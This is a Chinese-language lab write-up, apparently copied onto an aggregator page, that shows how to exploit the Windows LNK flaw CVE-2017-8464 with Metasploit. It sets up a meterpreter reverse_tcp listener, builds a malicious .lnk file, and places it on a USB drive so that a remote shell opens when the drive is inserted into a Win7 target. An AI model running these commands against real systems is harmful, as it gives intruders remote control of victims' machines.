天天看點

kali 切換root權限_号稱“震網三代”的遠端代碼執行漏洞,利用U盤擷取系統權限引言漏洞利用

17年的問題,最近清理以前磁盤的檔案發現這個記錄文檔,寫在這裡。

引言

微軟在2017年6月中旬釋出的更新檔包中包含了一個關于LNK檔案遠端代碼執行的漏洞,CVE編号為CVE-2017-8464,描述如果系統處理了惡意的.LNK檔案,則可能允許遠端執行代碼,成功利用這個漏洞會獲得與本地使用者相同的使用者權限,攻擊者可以通過任意可移動驅動器(如U盤)或者遠端共享的方式傳播攻擊。我們以U盤測試,當受害者主機加載該U盤即會受到攻擊,無需受害者手動點選通路U盤,斷開U盤shell會話保持。

當時影響任何未安裝CVE-2017-8464更新檔的Windows系統,可繞過MS10-046 & MS15-020更新檔防護,涉及Microsoft Windows 10、Microsoft Windows 7、Microsoft Windows 8、Microsoft Windows 8.1、Microsoft Windows Server 2008、Microsoft Windows Server 2012、Microsoft Windows Server 2016。

漏洞利用

測試環境:

攻擊機:kali 2.0(192.168.80.226)

靶機:win7 x64(192.168.80.114)

1、下載下傳exp放在kali對應目錄(新版kali應該已經自帶了),此處以放在該測試目錄為例(kali2.0:/usr/share/metasploit-framework/modules/exploit/windows/smb/),在kali裡配置監聽

msf > use exploit/multi/handlermsf exploit(handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcpPAYLOAD => windows/x64/meterpreter/reverse_tcpmsf exploit(handler) > set LHOST 192.168.80.226LHOST => 192.168.80.226msf exploit(handler) > exploit -j[*] Exploit running as background job.[*] Started reverse TCP handler on 192.168.80.226:4444msf exploit(handler) > [*] Starting the payload handler...back
           
msf > use exploit/windows/smb/cve_2017_8464_lnk_rcemsf exploit(cve_2017_8464_lnk_rce) > set PAYLOAD windows/x64/meterpreter/reverse_tcpPAYLOAD => windows/x64/meterpreter/reverse_tcpmsf exploit(cve_2017_8464_lnk_rce) > set LHOST 192.168.80.226LHOST => 192.168.80.226
           
msf exploit(cve_2017_8464_lnk_rce) > exploit
           

執行成功後會在/root/.msf4/local/*目錄生成.dll和.lnk檔案

2、在kali裡加載U盤,複制檔案到U盤根目錄

檢視加載的U盤:

kali 切換root權限_号稱“震網三代”的遠端代碼執行漏洞,利用U盤擷取系統權限引言漏洞利用

将kali目錄 /root/.msf4/local/* 下的 .lnk檔案複制到U盤根目錄

kali 切換root權限_号稱“震網三代”的遠端代碼執行漏洞,利用U盤擷取系統權限引言漏洞利用

複制完成後的U盤根目錄

kali 切換root權限_号稱“震網三代”的遠端代碼執行漏洞,利用U盤擷取系統權限引言漏洞利用

3、在靶機上插入U盤,無需手動點選通路U盤,靶機即可受到攻擊,測試在win7靶機中插入U盤時,kali攻擊機收到反彈的shell

kali 切換root權限_号稱“震網三代”的遠端代碼執行漏洞,利用U盤擷取系統權限引言漏洞利用
kali 切換root權限_号稱“震網三代”的遠端代碼執行漏洞,利用U盤擷取系統權限引言漏洞利用